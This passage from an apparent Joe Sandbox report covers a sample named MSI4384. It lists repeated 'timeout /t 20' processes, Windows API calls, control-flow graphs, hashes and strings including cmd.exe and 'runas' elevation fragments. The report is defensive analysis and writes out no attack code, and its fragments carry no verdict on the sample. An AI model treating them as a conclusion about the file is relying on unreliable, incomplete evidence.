                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:43
                                                                  Start time:02:55:42
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:44
                                                                  Start time:02:56:02
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:45
                                                                  Start time:02:56:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:47
                                                                  Start time:02:56:42
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:48
                                                                  Start time:02:57:02
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                    Execution Graph

                                                                    Execution Coverage:1.4%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:25.3%
                                                                    Total number of Nodes:352
                                                                    Total number of Limit Nodes:7

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    APIs
                                                                      • Part of subcall function 00426050: GetCurrentProcess.KERNEL32(00000008,?,F3E52339), ref: 00426060
                                                                      • Part of subcall function 00426050: OpenProcessToken.ADVAPI32(00000000), ref: 00426067
                                                                    • CoInitialize.OLE32(00000000), ref: 00427052
                                                                    • CoCreateInstance.OLE32(0046FD30,00000000,00000004,0047A530,00000000,?), ref: 00427082
                                                                    • CoUninitialize.COMBASE ref: 00427689
                                                                    • _com_issue_error.COMSUPP ref: 004276B7
                                                                      • Part of subcall function 004218E0: LocalFree.KERNEL32(?,F3E52339,?,00000000,0046B020,000000FF,?,?,00480558,?,?,004216A4,80004005), ref: 0042192C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                    • String ID: $
                                                                    • API String ID: 2507920217-3993045852
                                                                    • Opcode ID: d0b1e1f6d63ff4b318f897e3804dffeb5f1544878988a1113e186b39c3d0e9f4
                                                                    • Instruction ID: 32f417b831cbff905dad250218ed214d7d438bb8c38f81797d05b7b3ecea7306
                                                                    • Opcode Fuzzy Hash: d0b1e1f6d63ff4b318f897e3804dffeb5f1544878988a1113e186b39c3d0e9f4
                                                                    • Instruction Fuzzy Hash: 4832C170A04258DFDB11CFA8E818BAEBBB4AF09304F1440AAE445E7391DB795E49CF56

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(00486000,00000080,00000004,00000000,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?,?,0046167E,00000000), ref: 0045F096
                                                                    • VirtualProtect.KERNELBASE(00486000,00000080,00000002,00000000,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?,?,0046167E,00000000), ref: 0045F0BE
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?,?,0046167E,00000000), ref: 0045F0E0
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0045F0EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual$AddressFreeLibraryProc
                                                                    • String ID:
                                                                    • API String ID: 3998452802-0
                                                                    • Opcode ID: 3b523e94cf9b72af1f3778c66793d88a910f728f58033c36b3c4c6c5a7fd423b
                                                                    • Instruction ID: dbed3c2c82288a75c0616735a7f85422b6407906c223c68fc4ef6185f7824b95
                                                                    • Opcode Fuzzy Hash: 3b523e94cf9b72af1f3778c66793d88a910f728f58033c36b3c4c6c5a7fd423b
                                                                    • Instruction Fuzzy Hash: 33213D32600121ABCB215B69EC41A5B3398DF42B71B28423BFD11D72C2DF64DC0D869B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 149 426050-42606f GetCurrentProcess OpenProcessToken 150 426071-426076 149->150 151 426077-4260a4 GetTokenInformation 149->151 152 4260a6-4260ab 151->152 153 4260ae-4260be CloseHandle 151->153 152->153
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008,?,F3E52339), ref: 00426060
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00426067
                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0042609C
                                                                    • CloseHandle.KERNEL32(?), ref: 004260B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                    • String ID:
                                                                    • API String ID: 215268677-0
                                                                    • Opcode ID: adbb8c9d4858cc378d76e707055d0eb316b380be385038f57e84315f64713180
                                                                    • Instruction ID: 1d30a98ab121370f75b51424ec29e2e9926d5a919a4b8ad43ffd55d4d0d1dcd0
                                                                    • Opcode Fuzzy Hash: adbb8c9d4858cc378d76e707055d0eb316b380be385038f57e84315f64713180
                                                                    • Instruction Fuzzy Hash: 57F01274144301ABEB10DF20FC45B9A77E8BB44740F948839F9D4C1261E7B9955CEA67

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCommandLineW.KERNEL32(F3E52339,?,0000FFFF), ref: 00431F0D
                                                                      • Part of subcall function 00424F50: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000,?,?), ref: 00424F6C
                                                                    • ExitProcess.KERNEL32 ref: 004320E7
                                                                      • Part of subcall function 004289D0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00428A4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                    • String ID: Full command line:
                                                                    • API String ID: 1878577176-831861440
                                                                    • Opcode ID: 5f96dc68325525e323844a25e8897eee4a72fca6097062d7c5d0fb5ddce2be71
                                                                    • Instruction ID: 32d1c9a58d58fddcfcc5cbc652822765dc570c8019c1a829e8e345e228db0e74
                                                                    • Opcode Fuzzy Hash: 5f96dc68325525e323844a25e8897eee4a72fca6097062d7c5d0fb5ddce2be71
                                                                    • Instruction Fuzzy Hash: 4851B230D111289ACB25EB21DC59BEEB775AF54308F5441DEE009672A2EF781F88CB99

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 212 428210-42828c GetTokenInformation 213 4282f0-428303 212->213 214 42828e-428297 GetLastError 212->214 214->213 215 428299-4282a7 214->215 216 4282a9-4282ac 215->216 217 4282ae 215->217 218 4282db 216->218 219 4282b0-4282b7 217->219 220 4282de-4282ea GetTokenInformation 217->220 218->220 221 4282c7-4282d8 call 44ae90 219->221 222 4282b9-4282c5 call 4284a0 219->222 220->213 221->218 222->220
                                                                    APIs
                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,004281E8,F3E52339), ref: 00428284
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,004281E8,F3E52339), ref: 0042828E
                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,004281E8,F3E52339), ref: 004282EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InformationToken$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2567405617-0
                                                                    • Opcode ID: 808ee225d85512db5ca782e82fe2820d92cb9b9b04e6e1c1e1867febcc62d584
                                                                    • Instruction ID: abd610c3f5e292a3544d3a6ea920f36b6db94296c5baa8cb015c51854724f721
                                                                    • Opcode Fuzzy Hash: 808ee225d85512db5ca782e82fe2820d92cb9b9b04e6e1c1e1867febcc62d584
                                                                    • Instruction Fuzzy Hash: 0E31EE71A00615EFDB20CF98DC44BAFBBF9FB44710F60052EE415E3280EBB969048BA4

                                                                    Control-flow Graph

                                                                    control_flow_graph 227 45ed50-45ed5b 228 45ed5d-45ed67 227->228 229 45ed69-45ed75 227->229 228->229 230 45eda0-45edab call 44e5d2 228->230 231 45ed8b-45ed9c RtlAllocateHeap 229->231 235 45edad-45edaf 230->235 232 45ed77-45ed7e call 45cb10 231->232 233 45ed9e 231->233 232->230 239 45ed80-45ed89 call 462890 232->239 233->235 239->230 239->231
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045D0E3,00000001,00000364,00000000,?,000000FF,?,0044E0E9,?,?,?), ref: 0045ED94
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 54c49bf63418e3823805cb9bd513ed7b6f922891c72133560a6e033c66e2eaaf
                                                                    • Instruction ID: 483a6cdbb38db6f96cdd368edd41ad02610f4c88f39c11306af79a0e5eb2659a
                                                                    • Opcode Fuzzy Hash: 54c49bf63418e3823805cb9bd513ed7b6f922891c72133560a6e033c66e2eaaf
                                                                    • Instruction Fuzzy Hash: 99F05032500637ABDB641F63DC01B5B37689F813A2B054537EC04E7142EA38EE0D81ED

                                                                    Control-flow Graph

                                                                    control_flow_graph 242 45f530-45f552 VirtualProtect
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(00486000,00000080,00000002,?), ref: 0045F546
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 94ab004e4a4a5d84fe3484708a091fd62ba3a0bb68609dc496f11657a0e38c1d
                                                                    • Instruction ID: a9837318647010b234e6cfbf53247f315022a07b4698afbf7943521713271993
                                                                    • Opcode Fuzzy Hash: 94ab004e4a4a5d84fe3484708a091fd62ba3a0bb68609dc496f11657a0e38c1d
                                                                    • Instruction Fuzzy Hash: 80C08031340304B7E75057529C07F4B355C9741F54F114125F541D50C0D9D0DD044219
                                                                    APIs
                                                                    • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?,?), ref: 004279D8
                                                                    • GetForegroundWindow.USER32(?,?,?), ref: 00427A5D
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00427A7A
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00427AB8
                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?), ref: 00427B01
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00427B08
                                                                    • AllowSetForegroundWindow.USER32(00000000), ref: 00427B1E
                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?), ref: 00427B42
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00427B49
                                                                    • Sleep.KERNEL32(00000064,?,?,?,?), ref: 00427B6E
                                                                    • EnumWindows.USER32(00427CA0,?), ref: 00427B8A
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00004003,?,?,?,?), ref: 00427BA8
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?), ref: 00427BC5
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00427BD2
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00427CAC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00427CC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AddressExecuteForegroundHandleModuleProcProcessShellWindows$AllowCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                    • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                    • API String ID: 3646750338-986041216
                                                                    • Opcode ID: a6ac269b3b2dd6948b8a167c33e216c89a50a4e3569d8fadb94d57b6f9dd2f31
                                                                    • Instruction ID: 643efe58815a59271b0711d59abce77a1da039acb3874852ca75b2d64e891499
                                                                    • Opcode Fuzzy Hash: a6ac269b3b2dd6948b8a167c33e216c89a50a4e3569d8fadb94d57b6f9dd2f31
                                                                    • Instruction Fuzzy Hash: B3F10171B042199FDB00DFA8E888AAEBBB5FF08314F50816AE505E7391EB799D04CF54
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 0042D5C2
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,?), ref: 0042D61D
                                                                    • _swprintf.LIBCMT ref: 0042D822
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,?), ref: 0042D87D
                                                                    • _swprintf.LIBCMT ref: 0042D958
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf$FreeLocal
                                                                    • String ID: %$+
                                                                    • API String ID: 2429749586-2626897407
                                                                    • Opcode ID: a685fb05ae6baa4eda01d3070f25e9d6119b0b911c7ad483c78000b7443edb75
                                                                    • Instruction ID: 75b52c60dbb64978f4a5c98708b8320266709af328fc880fd5a46173ab09b4fc
                                                                    • Opcode Fuzzy Hash: a685fb05ae6baa4eda01d3070f25e9d6119b0b911c7ad483c78000b7443edb75
                                                                    • Instruction Fuzzy Hash: A902E271E002299FDB15DF64EC40BAEBBB5FF49304F54422AF811AB281D738A945CB99
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,F3E52339), ref: 00426322
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00426363
                                                                    • Process32FirstW.KERNEL32(?,0000022C), ref: 004263A5
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004263C0
                                                                    • CloseHandle.KERNEL32(?), ref: 00426517
                                                                    • Process32NextW.KERNEL32(?,0000022C), ref: 00426534
                                                                    • CloseHandle.KERNEL32(?), ref: 00426565
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 708755948-0
                                                                    • Opcode ID: 53ed0edd47b22b7607b9d15e913f5be08c64fbe9acf433226895bd380889161b
                                                                    • Instruction ID: a93d629b37fbf6ee0916ff78fb9207f637cd22e74d0931b68157767a2a09010c
                                                                    • Opcode Fuzzy Hash: 53ed0edd47b22b7607b9d15e913f5be08c64fbe9acf433226895bd380889161b
                                                                    • Instruction Fuzzy Hash: B2A15070905268DFDB20DF54DC487DEBBB4EB04304F5082EAE419A7291DBB95E88CF55
                                                                    APIs
                                                                    • GetUserDefaultLCID.KERNEL32 ref: 004651BF
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 004651FD
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00465210
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00465258
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00465273
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                    • String ID: lVG
                                                                    • API String ID: 3475089800-3134571959
                                                                    • Opcode ID: e17e74971ee1ac8227b625eab832a92b0504989839c98cf93ef4ed206313a279
                                                                    • Instruction ID: 3a680df6d1089171ceed010cd94970d27c5966ab6f208a82f20ae196e8e54043
                                                                    • Opcode Fuzzy Hash: e17e74971ee1ac8227b625eab832a92b0504989839c98cf93ef4ed206313a279
                                                                    • Instruction Fuzzy Hash: DE518F71E00A05ABEB20DFA5DC41BFF73B8AF49700F14056AE914E7291F77899448B6A
                                                                    APIs
                                                                    • __libm_sse2_log10_precise.LIBCMT ref: 00465C85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: __libm_sse2_log10_precise
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 3323863637-2761157908
                                                                    • Opcode ID: df17dd2455440a8f29a4a0aa9688c975f1936dc34238f4693b2bdb57db183ef5
                                                                    • Instruction ID: 404c254e73ce174c1c414b880503608dbe653fb05c1828ae83a584a95092c261
                                                                    • Opcode Fuzzy Hash: df17dd2455440a8f29a4a0aa9688c975f1936dc34238f4693b2bdb57db183ef5
                                                                    • Instruction Fuzzy Hash: F1C25C72E046288FDB65CE28DD407EAB7B5EB44304F1541EBD84DE7240EB79AE818F46
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00464F6E
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00464F97
                                                                    • GetACP.KERNEL32 ref: 00464FAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: 4aba080806bc9f67af97cb4ef2bf6a227b61f081e2b25e51dc65b96d1478daab
                                                                    • Instruction ID: 7d305b9afcf64f5086b839ee9d8e800d5f61ec013753acf27dcef6bd2907fe35
                                                                    • Opcode Fuzzy Hash: 4aba080806bc9f67af97cb4ef2bf6a227b61f081e2b25e51dc65b96d1478daab
                                                                    • Instruction Fuzzy Hash: 06219D32600101EAEF3C8B54D904A97B2A6ABD5B61B568026E90ADB204F73ADD81C35A
                                                                    APIs
                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 004619AD
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00461A28
                                                                    • FindClose.KERNEL32(00000000), ref: 00461A4A
                                                                    • FindClose.KERNEL32(00000000), ref: 00461A6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFile$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1164774033-0
                                                                    • Opcode ID: 9af2db644459e549966510ea67153d2ac619022e3fa4656d69bebe6354e52198
                                                                    • Instruction ID: 6e3df7c2f05a51e9fff6723c2dc7483d6475f98b0b03163d2da52e621b30c101
                                                                    • Opcode Fuzzy Hash: 9af2db644459e549966510ea67153d2ac619022e3fa4656d69bebe6354e52198
                                                                    • Instruction Fuzzy Hash: C7410971A00119AFDF20DFA4DD98AABB779EB45348F084197E40593250F6749E84CB5A
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0044A1FD
